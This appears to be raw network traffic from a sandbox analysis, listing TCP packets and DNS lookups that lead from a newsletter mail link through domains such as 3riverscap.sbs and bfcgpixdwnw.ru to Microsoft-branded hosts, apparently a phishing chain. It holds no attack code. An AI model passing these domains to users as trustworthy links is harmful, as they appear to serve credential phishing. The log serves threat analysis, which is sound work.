                                                                              Nov 26, 2024 20:55:31.719530106 CET49782443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:31.719558954 CET4434978235.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:31.720612049 CET4434978235.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:31.720685005 CET49782443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:31.720967054 CET49782443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:31.721052885 CET4434978235.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:31.721129894 CET49782443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:31.721137047 CET4434978235.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:31.749300003 CET49781443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:31.749311924 CET4434978135.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:31.765340090 CET49782443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:31.797435045 CET49781443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:32.078454018 CET4434978035.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:32.078546047 CET4434978035.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:32.078636885 CET49780443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:32.078860044 CET49780443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:32.078879118 CET4434978035.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:32.079590082 CET49783443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:32.079638004 CET4434978335.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:32.079718113 CET49783443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:32.079967022 CET49783443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:32.079981089 CET4434978335.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:32.164390087 CET4434978135.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:32.164474964 CET4434978135.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:32.164541006 CET49781443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:32.164696932 CET49781443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:32.164711952 CET4434978135.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:32.165160894 CET49784443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:32.165216923 CET4434978435.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:32.165316105 CET49784443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:32.165539980 CET49784443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:32.165553093 CET4434978435.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:32.201819897 CET4434978235.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:32.201899052 CET4434978235.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:32.201952934 CET49782443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:32.202140093 CET49782443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:32.202155113 CET4434978235.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:32.202598095 CET49785443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:32.202632904 CET4434978535.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:32.202697992 CET49785443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:32.202913046 CET49785443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:32.202925920 CET4434978535.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.346050024 CET4434978335.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.346451998 CET49783443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:33.346467018 CET4434978335.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.346828938 CET4434978335.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.347129107 CET49783443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:33.347213030 CET4434978335.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.347289085 CET49783443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:33.390886068 CET4434978435.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.391237020 CET49784443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:33.391258955 CET4434978435.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.391329050 CET4434978335.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.391653061 CET4434978435.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.391968012 CET49784443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:33.392066956 CET4434978435.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.392108917 CET49784443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:33.439338923 CET4434978435.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.444329977 CET49784443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:33.471802950 CET4434978535.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.472158909 CET49785443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:33.472181082 CET4434978535.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.472963095 CET4434978535.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.473299980 CET49785443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:33.473361969 CET4434978535.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.473440886 CET49785443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:33.515333891 CET4434978535.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.825455904 CET4434978335.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.825570107 CET4434978335.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.825628042 CET49783443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:33.825956106 CET49783443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:33.825983047 CET4434978335.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.863359928 CET4434978435.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.863580942 CET49784443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:33.863631964 CET4434978435.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.863795042 CET49784443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:33.952697039 CET4434978535.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.952801943 CET4434978535.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:33.952971935 CET49785443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:33.953165054 CET49785443192.168.2.1635.190.80.1
                                                                              Nov 26, 2024 20:55:33.953176975 CET4434978535.190.80.1192.168.2.16
                                                                              Nov 26, 2024 20:55:40.550409079 CET44349779172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:55:40.550482035 CET44349779172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:55:40.550599098 CET49779443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:55:42.415184021 CET49779443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:55:42.415224075 CET44349779172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:55:59.630642891 CET49696443192.168.2.1620.190.147.6
                                                                              Nov 26, 2024 20:55:59.630683899 CET4969880192.168.2.16192.229.221.95
                                                                              Nov 26, 2024 20:55:59.630764008 CET4969780192.168.2.162.20.68.201
                                                                              Nov 26, 2024 20:55:59.755069017 CET4434969620.190.147.6192.168.2.16
                                                                              Nov 26, 2024 20:55:59.755081892 CET8049698192.229.221.95192.168.2.16
                                                                              Nov 26, 2024 20:55:59.755130053 CET80496972.20.68.201192.168.2.16
                                                                              Nov 26, 2024 20:55:59.755208969 CET49696443192.168.2.1620.190.147.6
                                                                              Nov 26, 2024 20:55:59.755258083 CET4969880192.168.2.16192.229.221.95
                                                                              Nov 26, 2024 20:55:59.755296946 CET4969780192.168.2.162.20.68.201
                                                                              Nov 26, 2024 20:56:29.104513884 CET49795443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:56:29.104557991 CET44349795172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:56:29.104727030 CET49795443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:56:29.104969978 CET49795443192.168.2.16172.217.21.36
                                                                              Nov 26, 2024 20:56:29.104984045 CET44349795172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:56:30.902075052 CET44349795172.217.21.36192.168.2.16
                                                                              Nov 26, 2024 20:56:30.941463947 CET49795443192.168.2.16172.217.21.36
                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                              Nov 26, 2024 20:54:24.268836975 CET53570631.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:24.289932013 CET53566591.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:25.100759983 CET5193053192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:25.100936890 CET5988253192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:25.327930927 CET53519301.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:25.328442097 CET53598821.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:27.091144085 CET53519881.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:27.986552000 CET5237153192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:27.986686945 CET5781553192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:28.303183079 CET53523711.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:28.434989929 CET53578151.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:28.977180958 CET5098553192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:28.977226019 CET5495553192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:29.116647005 CET53549551.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:29.117419004 CET53509851.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:30.258749962 CET5663553192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:30.259011030 CET6279053192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:30.397097111 CET53566351.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:30.397728920 CET53627901.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:34.160670996 CET5361653192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:34.161328077 CET5125753192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:34.325011969 CET53512571.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:34.325025082 CET53536161.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:34.402312994 CET6083153192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:34.402616024 CET6456753192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:34.931077957 CET53608311.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:34.931093931 CET53645671.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:38.512857914 CET5244753192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:38.513000965 CET6150253192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:38.513256073 CET6036653192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:38.513375044 CET6340453192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:38.513855934 CET5253153192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:38.513968945 CET5083953192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:38.703707933 CET53603661.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:38.703748941 CET53525311.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:38.703829050 CET53508391.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:38.703974962 CET53524471.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:38.704322100 CET53634041.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:38.704533100 CET53615021.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:40.965938091 CET6253853192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:40.966098070 CET6254553192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:40.970351934 CET6132253192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:40.970495939 CET6493253192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:41.105773926 CET53625381.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:41.106606007 CET53625451.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:41.193502903 CET53649321.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:41.193520069 CET53613221.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:42.669553041 CET6292553192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:42.669801950 CET6167153192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:42.687632084 CET6290353192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:42.687891960 CET6552653192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:54:42.833025932 CET53629251.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:42.833226919 CET53616711.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:42.833266020 CET53655261.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:42.833709955 CET53629031.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:54:44.169670105 CET53507901.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:55:02.912275076 CET53636571.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:55:04.570046902 CET5110553192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:04.570199013 CET6115653192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:04.974591017 CET53511051.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:55:04.974663019 CET53611561.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:55:08.422431946 CET5608853192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:08.422478914 CET6045453192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:08.424426079 CET5076453192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:08.424792051 CET5404353192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:08.662631035 CET53540431.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:55:08.663608074 CET53507641.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:55:09.042340040 CET53604541.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:55:15.673923969 CET5894453192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:15.674093962 CET6312453192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:15.675540924 CET6117953192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:15.675693989 CET6054053192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:18.872704983 CET5004153192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:18.872844934 CET5203553192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:19.973020077 CET5898153192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:19.973169088 CET5939353192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:22.402652979 CET6540953192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:22.402810097 CET5736053192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:24.274961948 CET53529851.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:55:25.574690104 CET53496071.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:55:26.967390060 CET138138192.168.2.16192.168.2.255
                                                                              Nov 26, 2024 20:55:30.267676115 CET5643253192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:30.267796993 CET5310453192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:30.268305063 CET5830553192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:30.268423080 CET5513853192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:30.410262108 CET53531041.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:55:30.410485983 CET53583051.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:55:30.410639048 CET53551381.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:55:30.410964012 CET53564321.1.1.1192.168.2.16
                                                                              Nov 26, 2024 20:55:48.111644030 CET6030153192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:48.111767054 CET5653753192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:48.227256060 CET5279353192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:48.227471113 CET6205153192.168.2.161.1.1.1
                                                                              Nov 26, 2024 20:55:55.058996916 CET53574201.1.1.1192.168.2.16
                                                                              TimestampSource IPDest IPChecksumCodeType
                                                                              Nov 26, 2024 20:54:28.435076952 CET192.168.2.161.1.1.1c2ac(Port unreachable)Destination Unreachable
                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                              Nov 26, 2024 20:54:25.100759983 CET192.168.2.161.1.1.10x71f7Standard query (0)link.mail.beehiiv.comA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:25.100936890 CET192.168.2.161.1.1.10xe385Standard query (0)link.mail.beehiiv.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:27.986552000 CET192.168.2.161.1.1.10x9b97Standard query (0)3riverscap.sbsA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:27.986686945 CET192.168.2.161.1.1.10xab8fStandard query (0)3riverscap.sbs65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:28.977180958 CET192.168.2.161.1.1.10xa424Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:28.977226019 CET192.168.2.161.1.1.10xf1Standard query (0)www.google.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:30.258749962 CET192.168.2.161.1.1.10x8fd8Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:30.259011030 CET192.168.2.161.1.1.10x6555Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:34.160670996 CET192.168.2.161.1.1.10x5c66Standard query (0)3riverscap.sbsA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:34.161328077 CET192.168.2.161.1.1.10x426fStandard query (0)3riverscap.sbs65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:34.402312994 CET192.168.2.161.1.1.10xed17Standard query (0)7x7.jaaqwamco.ruA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:34.402616024 CET192.168.2.161.1.1.10x6b26Standard query (0)7x7.jaaqwamco.ru65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:38.512857914 CET192.168.2.161.1.1.10x9034Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:38.513000965 CET192.168.2.161.1.1.10x2e6Standard query (0)code.jquery.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:38.513256073 CET192.168.2.161.1.1.10xf21bStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:38.513375044 CET192.168.2.161.1.1.10x35dcStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:38.513855934 CET192.168.2.161.1.1.10x3e1fStandard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:38.513968945 CET192.168.2.161.1.1.10x6216Standard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:40.965938091 CET192.168.2.161.1.1.10x4da7Standard query (0)code.jquery.comA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:40.966098070 CET192.168.2.161.1.1.10xff52Standard query (0)code.jquery.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:40.970351934 CET192.168.2.161.1.1.10x7e10Standard query (0)cdnjs.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:40.970495939 CET192.168.2.161.1.1.10x25dStandard query (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:42.669553041 CET192.168.2.161.1.1.10xe444Standard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:42.669801950 CET192.168.2.161.1.1.10xf851Standard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:42.687632084 CET192.168.2.161.1.1.10x3bedStandard query (0)challenges.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:42.687891960 CET192.168.2.161.1.1.10x5a0fStandard query (0)challenges.cloudflare.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:55:04.570046902 CET192.168.2.161.1.1.10x7265Standard query (0)uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ruA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:04.570199013 CET192.168.2.161.1.1.10x9d80Standard query (0)uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ru65IN (0x0001)false
                                                                              Nov 26, 2024 20:55:08.422431946 CET192.168.2.161.1.1.10x47edStandard query (0)www.sharepoint.comA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:08.422478914 CET192.168.2.161.1.1.10xd1a9Standard query (0)www.sharepoint.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:55:08.424426079 CET192.168.2.161.1.1.10x83f0Standard query (0)uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ruA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:08.424792051 CET192.168.2.161.1.1.10xef14Standard query (0)uxxrejmt6jqxcuujcxblqanwhjvd5pcl9nswmcr2amxwat4lija5ohuixy2.bfcgpixdwnw.ru65IN (0x0001)false
                                                                              Nov 26, 2024 20:55:15.673923969 CET192.168.2.161.1.1.10x7003Standard query (0)assets.onestore.msA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:15.674093962 CET192.168.2.161.1.1.10xe9eStandard query (0)assets.onestore.ms65IN (0x0001)false
                                                                              Nov 26, 2024 20:55:15.675540924 CET192.168.2.161.1.1.10x174aStandard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:15.675693989 CET192.168.2.161.1.1.10xf73Standard query (0)ajax.aspnetcdn.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:55:18.872704983 CET192.168.2.161.1.1.10xeb13Standard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:18.872844934 CET192.168.2.161.1.1.10x333bStandard query (0)ajax.aspnetcdn.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:55:19.973020077 CET192.168.2.161.1.1.10x7c84Standard query (0)c.s-microsoft.comA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:19.973169088 CET192.168.2.161.1.1.10xf5d7Standard query (0)c.s-microsoft.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:55:22.402652979 CET192.168.2.161.1.1.10x47c0Standard query (0)c.s-microsoft.comA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:22.402810097 CET192.168.2.161.1.1.10x2d9eStandard query (0)c.s-microsoft.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:55:30.267676115 CET192.168.2.161.1.1.10xa5b4Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:30.267796993 CET192.168.2.161.1.1.10xaab2Standard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:55:30.268305063 CET192.168.2.161.1.1.10x9e19Standard query (0)a.nel.cloudflare.comA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:30.268423080 CET192.168.2.161.1.1.10x557cStandard query (0)a.nel.cloudflare.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:55:48.111644030 CET192.168.2.161.1.1.10x4e43Standard query (0)ajax.aspnetcdn.comA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:48.111767054 CET192.168.2.161.1.1.10x68dcStandard query (0)ajax.aspnetcdn.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:55:48.227256060 CET192.168.2.161.1.1.10x173aStandard query (0)assets.onestore.msA (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:55:48.227471113 CET192.168.2.161.1.1.10xc28dStandard query (0)assets.onestore.ms65IN (0x0001)false
                                                                              TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                              Nov 26, 2024 20:54:25.327930927 CET1.1.1.1192.168.2.160x71f7No error (0)link.mail.beehiiv.com104.18.69.40A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:25.327930927 CET1.1.1.1192.168.2.160x71f7No error (0)link.mail.beehiiv.com104.18.68.40A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:25.328442097 CET1.1.1.1192.168.2.160xe385No error (0)link.mail.beehiiv.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:28.303183079 CET1.1.1.1192.168.2.160x9b97No error (0)3riverscap.sbs162.159.140.160A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:28.303183079 CET1.1.1.1192.168.2.160x9b97No error (0)3riverscap.sbs162.159.140.104A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:28.303183079 CET1.1.1.1192.168.2.160x9b97No error (0)3riverscap.sbs172.66.0.158A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:28.303183079 CET1.1.1.1192.168.2.160x9b97No error (0)3riverscap.sbs172.66.0.102A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:28.434989929 CET1.1.1.1192.168.2.160xab8fNo error (0)3riverscap.sbs65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:29.116647005 CET1.1.1.1192.168.2.160xf1No error (0)www.google.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:29.117419004 CET1.1.1.1192.168.2.160xa424No error (0)www.google.com172.217.21.36A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:30.397097111 CET1.1.1.1192.168.2.160x8fd8No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:34.325011969 CET1.1.1.1192.168.2.160x426fNo error (0)3riverscap.sbs65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:34.325025082 CET1.1.1.1192.168.2.160x5c66No error (0)3riverscap.sbs172.66.0.158A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:34.325025082 CET1.1.1.1192.168.2.160x5c66No error (0)3riverscap.sbs162.159.140.104A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:34.325025082 CET1.1.1.1192.168.2.160x5c66No error (0)3riverscap.sbs162.159.140.160A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:34.325025082 CET1.1.1.1192.168.2.160x5c66No error (0)3riverscap.sbs172.66.0.102A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:34.931077957 CET1.1.1.1192.168.2.160xed17No error (0)7x7.jaaqwamco.ru172.67.180.192A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:34.931077957 CET1.1.1.1192.168.2.160xed17No error (0)7x7.jaaqwamco.ru104.21.31.235A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:34.931093931 CET1.1.1.1192.168.2.160x6b26No error (0)7x7.jaaqwamco.ru65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:38.703707933 CET1.1.1.1192.168.2.160xf21bNo error (0)challenges.cloudflare.com104.18.95.41A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:38.703707933 CET1.1.1.1192.168.2.160xf21bNo error (0)challenges.cloudflare.com104.18.94.41A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:38.703748941 CET1.1.1.1192.168.2.160x3e1fNo error (0)cdnjs.cloudflare.com104.17.24.14A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:38.703748941 CET1.1.1.1192.168.2.160x3e1fNo error (0)cdnjs.cloudflare.com104.17.25.14A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:38.703829050 CET1.1.1.1192.168.2.160x6216No error (0)cdnjs.cloudflare.com65IN (0x0001)false
                                                                              Nov 26, 2024 20:54:38.703974962 CET1.1.1.1192.168.2.160x9034No error (0)code.jquery.com151.101.2.137A (IP address)IN (0x0001)false
                                                                              Nov 26, 2024 20:54:38.703974962 CET1.1.1.1192.168.2.160x9034No error (0)code.jquery.com151.101.194.137A (IP address)IN (0x0001)false
